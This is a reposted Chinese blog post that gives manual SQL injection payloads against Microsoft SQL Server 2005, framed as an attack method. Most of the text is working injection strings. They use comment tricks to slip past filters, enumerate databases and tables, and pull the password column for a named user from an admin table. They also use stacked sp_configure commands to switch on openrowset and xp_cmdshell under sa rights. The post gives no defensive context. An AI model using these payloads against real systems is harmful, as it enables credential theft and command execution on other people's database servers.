码迷,mamicode.com
首页 > 数据库 > 详细

mssql2005存手工注入漏洞附攻击方法- 寒龙网出品

时间:2014-05-08 19:02:39      阅读:336      评论:0      收藏:0      [点我收藏+]

标签:des   style   color   width   c   数据   

/**/跟空格的作用一样,有的时候可以过一些过滤爆库语句,修改红色部分的数字挨个猜出库

 
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--


爆表语句,somedb部份是所要列的数据库,红色数字1累加

 
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--


爆字段语句,爆表admin里user=‘‘icerover‘‘的密码段

 
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user=‘‘icerover‘‘/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--


mssql2005默认没有开xp_cmdshell的,openrowset也不能用
如果是sa权限,可以这样来开启
开启openrowset

 
/**/sp_configure/**/‘‘show/**/advanced/**/options‘‘,/**/1;RECONFIGURE;--
/**/sp_configure/**/‘‘Ad/**/Hoc/**/Distributed/**/Queries‘‘,/**/1;RECONFIGURE;--


开启xp_cmdshell

 
EXEC/**/sp_configure/**/‘‘Ad/**/Hoc/**/Distributed/**/Queries‘‘,1;RECONFIGURE;--
EXEC/**/sp_configure/**/‘‘show/**/advanced/**/options‘‘,1;RECONFIGURE;EXEC/**/sp_configure/**/‘‘xp_cmdshell‘‘,1;RECONFIGURE;--
 
 

mssql2005存手工注入漏洞附攻击方法- 寒龙网出品,布布扣,bubuko.com

mssql2005存手工注入漏洞附攻击方法- 寒龙网出品

标签:des   style   color   width   c   数据   

原文地址:http://www.cnblogs.com/Hkadmin/p/3713767.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!